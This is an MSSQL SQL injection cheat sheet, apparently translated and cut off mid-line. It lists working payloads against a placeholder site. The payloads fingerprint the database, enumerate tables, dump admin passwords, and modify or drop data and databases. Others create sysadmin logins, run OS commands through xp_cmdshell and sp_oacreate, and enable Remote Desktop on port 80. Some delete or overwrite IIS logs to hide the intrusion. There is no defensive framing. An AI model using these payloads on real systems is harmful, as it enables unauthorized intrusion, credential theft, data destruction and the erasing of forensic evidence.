and exists (select * from sysobjects) // checks whether the backend is MSSQL
and exists (select * from tableName) // checks whether a table exists; tableName is the table name
and 1=(select @@VERSION) // MSSQL version
and 1=(select db_name()) // current database name
and 1=(select @@servername) // local server name
and 1=(select IS_SRVROLEMEMBER('sysadmin')) // checks whether the current login is a system administrator
and 1=(select IS_MEMBER('db_owner')) // checks whether the current user has db_owner rights
and 1=(select HAS_DBACCESS('master')) // checks whether the current user can access the master database
and 1=(select name from master.dbo.sysdatabases where dbid=1) // exposes database names; dbid is 1, 2, 3 ...
; declare @d int // checks whether stacked (multi-statement) queries are supported
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell') // checks whether xp_cmdshell exists
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread') // checks whether the xp_regread extended stored procedure has been removed
Add or remove a user named test with SA privileges (SA privileges required):
exec master.dbo.sp_addlogin 'test', 'password'
exec master.dbo.sp_addsrvrolemember 'test', 'sysadmin'
Stop or start a service (SA privileges required):
exec master..xp_servicecontrol 'stop', 'schedule'
exec master..xp_servicecontrol 'start', 'schedule'
Expose the website directory (read from the IIS virtual roots registry key):
create table labeng (lala nvarchar(255), id int)
declare @result varchar(255); exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output; insert into labeng (lala) values (@result);
and 1=(select top 1 lala from labeng), or: and 1=(select count(*) from labeng where lala>1)
-----------------------------------------------------
Enable Remote Desktop (port 3389) from the command line and change its port:
sc config termservice start= auto
net start termservice
// allow external connections
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
// move port 3389 to port 80
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f
SQL Server
Check whether the parameter is injectable:
http://www.targer.com/article.asp?id=6
http://www.targer.com/article.asp?id=6 and 1=1
http://www.targer.com/article.asp?id=6 and 1=2
http://www.targer.com/article.asp?action=value and 1=1
http://www.targer.com/article.asp?action=value and 1=2
Search fields: % and 1=1
Search fields: % and 1=2
Determine the database type:
http://www.targer.com/article.asp?id=6 and user>0
http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user's data:
article.asp?id=6 having 1=1 --
Columns in the current table:
article.asp?id=6 group by admin.username having 1=1 --
article.asp?id=6 group by admin.username, admin.password having 1=1 --
Arbitrary tables and columns:
and (select top 1 name from (select top N id, name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top 1 col_name(object_id('admin'), N) from sysobjects)>1
Expose database data:
and (select top 1 password from admin where id=N)>1
Modify data in the database:
; update admin set password='oooooo' where username='xxx'
Add data to the database:
; insert into admin values ('xxx', 'Oooooooo') --
Delete a database:
; drop database webdata
Get the current database user: and user>0
Get the current database name: and db_name()>0
Get the database version: and (select @@version)>0
Check whether stacked (multi-statement) queries are supported: ; declare @a int --
Check whether subqueries are supported: and (select count(1) from [sysobjects])>=0
Extended stored procedure: exec master..xp_cmdshell
List the server's C: directory: ; exec master..xp_cmdshell 'dir c:'
Check whether the extended stored procedure exists: and (select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')>0
Restore the extended stored procedure: ; exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
Remove the extended stored procedure: ; exec sp_dropextendedproc 'xp_cmdshell'
MSSQL 2000 also provides the OLE Automation procedures, which can be used to indirectly obtain access to OLE objects:
; declare @s int
; exec sp_oacreate 'wscript.shell', @s out
; exec master..sp_oamethod @s, 'run', null, 'cmd.exe /c dir c:'
Check whether the current database user has high privileges:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Check whether the current database user is db_owner:
and 1=(select is_member('db_owner'))
Every database in a SQL Server instance is listed in master.dbo.sysdatabases, and only PUBLIC permission is needed to SELECT from it:
and (select top 1 name from master.dbo.sysdatabases order by dbid)>0
and (select top 1 name from master.dbo.sysdatabases where name not in (select top 1 name from master.dbo.sysdatabases order by dbid))>0
Delete log records:
; exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'
Replace log records:
; exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log > c:\temp.txt'
Obtain the web root path:
; declare @shell int
; exec master..sp_oacreate 'wscript.shell', @shell out
; exec master..sp_oamethod @shell, 'run', null, 'cmd.exe /c dir /s d:\index.asp > c:\log.txt'
Search with xp_cmdshell:
; exec master..xp_cmdshell 'dir /s d:\index.asp'
Commands that display the server's website configuration:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use xp_regread to read the registry with PUBLIC permissions:
; exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots', '/'
For more on advanced SQL Server techniques, see chapter 5 of Proficient Script Hacker by Zeng Yunhao.
3. DSqlHelper
Check the sysadmin privilege:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
Check serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin and db_owner the same way.
Check xp_cmdshell (runs CMD commands):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_cmdshell')
Check xp_regread (registry read function):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
Check sp_makewebtask (backup function):
and 1=(select count(*) from master.dbo.sysobjects where name='sp_makewebtask')
Check sp_addextendedproc:
and 1=(select count(*) from master.dbo.sysobjects where name='sp_addextendedproc')
Check xp_subdirs (reads subdirectories):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_subdirs')
Check xp_dirtree (reads the directory tree):
and 1=(select count(*) from master.dbo.sysobjects where name='xp_dirtree')
Modify content:
; update <table name> set <field>=<content> where 1=1
xp_cmdshell detection:
; exec master..xp_cmdshell 'dir c:'
Restore xp_cmdshell:
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
Use xp_cmdshell to add a user named hacker:
; Exec master. db